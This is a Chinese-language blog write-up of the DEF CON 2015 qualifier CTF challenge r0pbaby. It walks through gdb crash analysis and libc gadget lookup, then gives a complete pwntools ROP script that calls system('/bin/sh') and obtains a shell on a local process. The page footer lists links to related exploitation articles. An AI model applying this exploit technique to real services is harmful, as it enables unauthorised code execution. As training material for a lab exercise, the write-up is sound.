Defcon - 2015 - 初賽 - r0pbaby writeup

原創 jchalex 2018-09-03 08:02

資源

r0pbaby 程序

目的

getshell

思路

查看文件類型

$ file r0pbaby
r0pbaby: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, stripped

這是一個64位的可執行文件

查看文件安全策略

$ checksec r0pbaby
[*] '/home/jc/Documents/pwn/r0pbaby'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
    FORTIFY:  Enabled

開啓了NX,需要進行ROP

添加執行權限,運行玩一玩

$ chmod u+x r0pbaby
$ ./r0pbaby
Welcome to an easy Return Oriented Programming challenge...
Menu:
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: 1
libc.so.6: 0x00007FB66BC239B0
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: 2
Enter symbol: system
Symbol system: 0x00007FB66B476390
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: 3
Enter bytes to send (max 1024): 4
ABCD
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: Bad choice.

從這裏我們可以知道,應該可以利用3),控制rip。因爲這是一個64位的ELF,參數/bin/sh存儲在rdi中,而不是棧中。所以,想要執行system(‘/bin/sh’),我們需要在call system前,將/bin/sh放在棧頂並執行一次pop rdi。

我們嘗試讓程序崩潰看看,操起gdb

$ gdb -q r0pbaby
Reading symbols from r0pbaby...(no debugging symbols found)...done.

創建長度爲50的字符串

gdb-peda$ pattern_create 50
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA'

運行

gdb-peda$ r
Starting program: /home/jc/Documents/pwn/r0pbaby

輸入剛纔生成的長度爲50的字符串

Welcome to an easy Return Oriented Programming challenge...
Menu:
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: 3
Enter bytes to send (max 1024): 50
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: Bad choice.

Program received signal SIGSEGV, Segmentation fault.

Segmentation fault 崩潰了!

根據提示

[-------------------------------------code-------------------------------------]
   0x555555554eae:  pop    r14
   0x555555554eb0:  pop    r15
   0x555555554eb2:  pop    rbp
=> 0x555555554eb3:  ret    
   0x555555554eb4:  nop    WORD PTR cs:[rax+rax*1+0x0]
   0x555555554ebe:  xchg   ax,ax
   0x555555554ec0:  push   r15
   0x555555554ec2:  mov    r15d,edi

我們知道程序崩潰在了

=> 0x555555554eb3:  ret

此時ret的返回地址,此時rsp的指向爲

gdb-peda$ x/x $rsp
0x7fffffffdc98: 0x6e41412441414241
gdb-peda$ x/s $rsp
0x7fffffffdc98: "ABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA"

查看偏移量

gdb-peda$ pattern_offset ABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA
ABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA found at offset: 8

也就是說,程序會以我們輸入的偏移量爲8的位置去取ret的地址,this is so good!我們可以藉此控制rip!此時的棧,是這樣子的:

---------- 內存高地址
...
----------
(AADAA;A
----------
AACAA-AA
----------
ABAA$AAn   <- ret
----------
AAA%AAsA
----------
...
---------- 內存低地址

libc裏通常有這樣的一個gadget

pop rax
pop rdi
call rax

如果我們構造一個這樣的棧空間

---------- 內存高地址
...
----------
/bin/sh的地址      pop rdi
----------
system()的地址     pop rax
----------
gadget ppc的地址   <- ret
----------
AAA%AAsA
----------
...
---------- 內存低地址

Great!對不對?
那麼,接下來我們要做幾件事:

  1. 獲取libc中system的地址
  2. 獲取libc中/bin/sh的地址
  3. 獲取libc中ppc gadget的地址
  4. 獲取運行時system的地址
  5. 構造payload併發送getshell

下面我們利用本地的libc文件做下測試,本地libc路徑位於:/lib/x86_64-linux-gnu/libc-2.23.so

獲取libc中system的地址

IDA shift + f12,ctrl + f,system

system

得到libc中system的地址爲0x45390

獲取libc中/bin/sh的地址

IDA shift + f12,ctrl + f,/bin/sh

/bin/sh
/bin/sh addr

得到libc中/bin/sh的地址爲0x18cd17

獲取libc中ppc gadget的地址

IDA alt + t,pop rdi,直到找到ppc爲止

ppc

得到libc中ppc的地址爲0x1073d9

獲取運行時system的地址

運行程序的時候,輸入2,再輸入system,就出來了

構造payload併發送getshell

#!/usr/bin/python

from pwn import *


def get_addr_sys(sh):
    sh.sendline('2')
    sh.recv()
    sh.sendline('system')
    ret = sh.recvline().split(' ')[-1]
    sh.recv()
    ret = long(ret, 16)
    return ret


def get_shell(sh, addr_sys, ppc_offset, bin_sh_offset):
    print('addr_sys: %x' % addr_sys)
    print('pop_pop_call_offset: %x' % ppc_offset)
    print('bin_sh_offset: %x' % bin_sh_offset)
    sh.sendline('3')
    sh.recv()
    sh.sendline('32')
    payload = 'A' * 8 + p64(addr_sys + ppc_offset) + p64(addr_sys) + p64(addr_sys + bin_sh_offset)
    print(len(payload))
    sh.sendline(payload)
    sh.recv()
    return


def main():
    sh = process('./r0pbaby')
    addr_sys = get_addr_sys(sh)
    libc_addr_pop_rdi = 0x1073d9
    libc_addr_bin_sh = 0x18cd17
    libc_addr_sys = 0x45390

    ppc_offset = libc_addr_pop_rdi - libc_addr_sys
    bin_sh_offset = libc_addr_bin_sh - libc_addr_sys
    get_shell(sh, addr_sys, ppc_offset, bin_sh_offset)
    sh.interactive()
    sh.close()


if __name__ == '__main__':
    main()

本地測試結果

$ python r0pbaby_solver.py 
[+] Starting local process './r0pbaby': pid 6061
addr_sys: 7fabe3959390
pop_pop_call_offset: c2049
bin_sh_offset: 147987
32
[*] Switching to interactive mode
$ whoami
jc
$
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

Adobe PDF LibTiff Integer Overflow CVE-2010-0188分析

一,TIFF圖像格式介紹 TIFF文件分爲文件頭IFH和IFD兩部分。 IFH結構見下圖: 共有8字節。其中 0-1 規定爲“II”或“MM”,Intel/Mortorola類型的字節序列 2-3 TIFF版本號,爲向下兼容,值爲42

p0x1307 2020-07-05 19:06:34

論文閱讀:KOOBE: Towards Facilitating Exploit Generation of Kernel Out-Of-Bounds Write Vulnerabilities

Usenix Security 2020 的一篇關於內核OOB漏洞自動化利用的文章,感覺寫的不錯。 文章目錄簡介研究背景研究方法研究假設核心思想實現測試評估總結 簡介 這篇文章的主要目的是爲了評估堆溢出漏洞的可利用性,從而方便

破落之实 2020-07-03 23:25:39

nebula level18

About Analyse the C program, and look for vulnerabilities in the program. There is an easy way to solve this level, an

陈阿福 2020-06-29 11:24:59

Nebula level16

http://www.exploit-exercises.com/nebula/level16 About There is a perl script running on port 1616. To do this level,

陈阿福 2020-06-29 10:40:49

黑客入門之fusion level02

本文轉自下面的鏈接 https://qqp.ca/2013/07/15/fusion-level-02.html 對最後的exploit 中的payload2做了小小的修改,可以得到shell。 Level 02 introduces n

陈阿福 2020-06-29 10:40:48

黑客入門之fusion level01

http://exploit-exercises.com/fusion/level01 About level00 with stack/heap/mmap aslr, without info leak :) Vulnerabilit

陈阿福 2020-06-29 10:40:48

pwnable.kr - fd

題目: 題目鏈接:http://pwnable.kr/play.php ——> 連接登錄: ssh [email protected] -p2222 查看文件及權限: ls -al 看到flag文件,但是當前用戶fd並沒有讀

jchalex 2020-06-29 07:47:26

命令行下修改DEP

bcdedit.exe /set nx OptIn bcdedit.exe /set nx OptOut bcdedit.exe /set nx AlwaysOn bcdedit.exe /set nx AlwaysOff

sam20151111sam 2020-06-27 11:30:46

如何查看程序是否支持ASLR

使用工具PE EXPLOER打開,查看DllCharacteristics是否包含0x40就可以知道是否支持ASLR

sam20151111sam 2020-06-27 11:30:45

Easy RM to Mp3 Converter測試rop的代碼

my $file="rop.m3u"; my $buffersize=26094-20-8-4; my $junk="A"x$buffersize;

sam20151111sam 2020-06-27 11:30:45

合天網安實驗室CTF-Exp200-Come on,Exploit me!

合天網安實驗室CTF-Exp200-Come on,Exploit me! 題目描述   Audrey Tang. ⊙.⊙ 我只能說到這兒了 相關附件   exp200 參考解題步驟 1、下載附件先用VSCode打開看看 換個

皮卡皮卡~ 2020-06-27 04:27:26

WinXP/Win7/Win8通用shellcode

轉自http://hi.baidu.com/egodcore/item/c13e67fe197c940fc6dc45f5 衆所周知,在windows xp時代未啓用ASLR(Address space layout randomizat

SauceJ 2020-06-13 08:31:30

shellcode轉換成彙編代碼

方法1:提取ShellCode中的機器碼---->把機器碼粘貼到WinHEX並保存成exe文件---->用C32Asm反彙編---->得到反彙編碼。 方法2:提取ShellCode中的機器碼---->用OllyDBG隨便打開一個exe程序

SauceJ 2020-06-13 08:31:20

從零開始學Fuzzing系列:瀏覽器挖掘框架Morph誕生記

lanceleo 2020-06-02 06:37:28

PE文件基址重定位

SauceJ 2020-02-26 01:27:20